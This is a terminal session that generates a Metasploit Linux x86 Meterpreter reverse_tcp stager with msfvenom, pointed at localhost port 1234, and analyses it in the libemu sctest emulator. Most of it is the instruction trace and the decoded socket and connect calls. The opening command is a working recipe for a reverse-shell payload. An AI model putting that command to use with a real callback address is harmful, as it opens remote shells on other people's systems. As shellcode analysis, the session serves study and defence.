$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 -f raw | ./sctest -vvv -Ss 10000
verbose = 3
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes

[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417000
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x55caa5d80740 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417000
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x55caa5d80740 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 6A0A                            push byte 0xa
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417002
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x55caa5d80740 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 5E                              pop esi
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417003
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x55caa5d80740 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 31DB                            xor ebx,ebx
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417005
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x55caa5d80740 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: PF ZF 
[emu 0x0x55caa5d80740 debug ] F7E3                            mul ebx
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417007
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x55caa5d80740 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: PF ZF 
[emu 0x0x55caa5d80740 debug ] 53                              push ebx
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417008
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x55caa5d80740 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: PF ZF 
[emu 0x0x55caa5d80740 debug ] 43                              inc ebx
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417009
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x55caa5d80740 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 53                              push ebx
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x0041700a
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x55caa5d80740 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 6A02                            push byte 0x2
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x0041700c
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x55caa5d80740 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] B066                            mov al,0x66
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x0041700e
[emu 0x0x55caa5d80740 debug ] eax=0x00000066  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x55caa5d80740 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 89E1                            mov ecx,esp
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417010
[emu 0x0x55caa5d80740 debug ] eax=0x00000066  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x55caa5d80740 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] CD80                            int 0x80
int socket(int domain=2, int type=1, int protocol=0);
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417012
[emu 0x0x55caa5d80740 debug ] eax=0x0000000e  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x55caa5d80740 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x00000000
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 97                              xchg eax,edi
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417013
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x55caa5d80740 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 5B                              pop ebx
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417014
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000002
[emu 0x0x55caa5d80740 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 687F000001                      push dword 0x100007f
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417019
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000002
[emu 0x0x55caa5d80740 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 68020004D2                      push dword 0xd2040002
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x0041701e
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000002
[emu 0x0x55caa5d80740 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 89E1                            mov ecx,esp
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417020
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x55caa5d80740 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 6A66                            push byte 0x66
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417022
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x55caa5d80740 debug ] esp=0x00416fba  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 58                              pop eax
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417023
[emu 0x0x55caa5d80740 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x55caa5d80740 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 50                              push eax
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417024
[emu 0x0x55caa5d80740 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x55caa5d80740 debug ] esp=0x00416fba  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 51                              push ecx
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417025
[emu 0x0x55caa5d80740 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb6  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 57                              push edi
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417026
[emu 0x0x55caa5d80740 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000002
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 89E1                            mov ecx,esp
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417028
[emu 0x0x55caa5d80740 debug ] eax=0x00000066  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000002
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: 
[emu 0x0x55caa5d80740 debug ] 43                              inc ebx
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417029
[emu 0x0x55caa5d80740 debug ] eax=0x00000066  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: PF 
[emu 0x0x55caa5d80740 debug ] CD80                            int 0x80
connect
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x0041702b
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: PF 
[emu 0x0x55caa5d80740 debug ] 85C0                            test eax,eax
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x0041702d
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: PF ZF 
[emu 0x0x55caa5d80740 debug ] 79                              jns 0x1
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417048
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: PF ZF 
[emu 0x0x55caa5d80740 debug ] B207                            mov dl,0x7
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x0041704a
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000007  ebx=0x00000003
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: PF ZF 
[emu 0x0x55caa5d80740 debug ] B900100000                      mov ecx,0x1000
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x0041704f
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00001000  edx=0x00000007  ebx=0x00000003
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: PF ZF 
[emu 0x0x55caa5d80740 debug ] 89E3                            mov ebx,esp
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417051
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00001000  edx=0x00000007  ebx=0x00416fb2
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: PF ZF 
[emu 0x0x55caa5d80740 debug ] C1EB0C                          shr ebx,0xc
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417054
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00001000  edx=0x00000007  ebx=0x00000416
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: CF 
[emu 0x0x55caa5d80740 debug ] C1E30C                          shl ebx,0xc
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417057
[emu 0x0x55caa5d80740 debug ] eax=0x00000000  ecx=0x00001000  edx=0x00000007  ebx=0x00416000
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: CF PF 
[emu 0x0x55caa5d80740 debug ] B07D                            mov al,0x7d
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x00417059
[emu 0x0x55caa5d80740 debug ] eax=0x0000007d  ecx=0x00001000  edx=0x00000007  ebx=0x00416000
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: CF PF 
[emu 0x0x55caa5d80740 debug ] CD80                            int 0x80
stepcount 32
[emu 0x0x55caa5d80740 debug ] cpu state    eip=0x0041705b
[emu 0x0x55caa5d80740 debug ] eax=0x0000007d  ecx=0x00001000  edx=0x00000007  ebx=0x00416000
[emu 0x0x55caa5d80740 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000a  edi=0x0000000e
[emu 0x0x55caa5d80740 debug ] Flags: CF PF 
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 53764 (port=1234);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 16777343 (host=127.0.0.1);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;
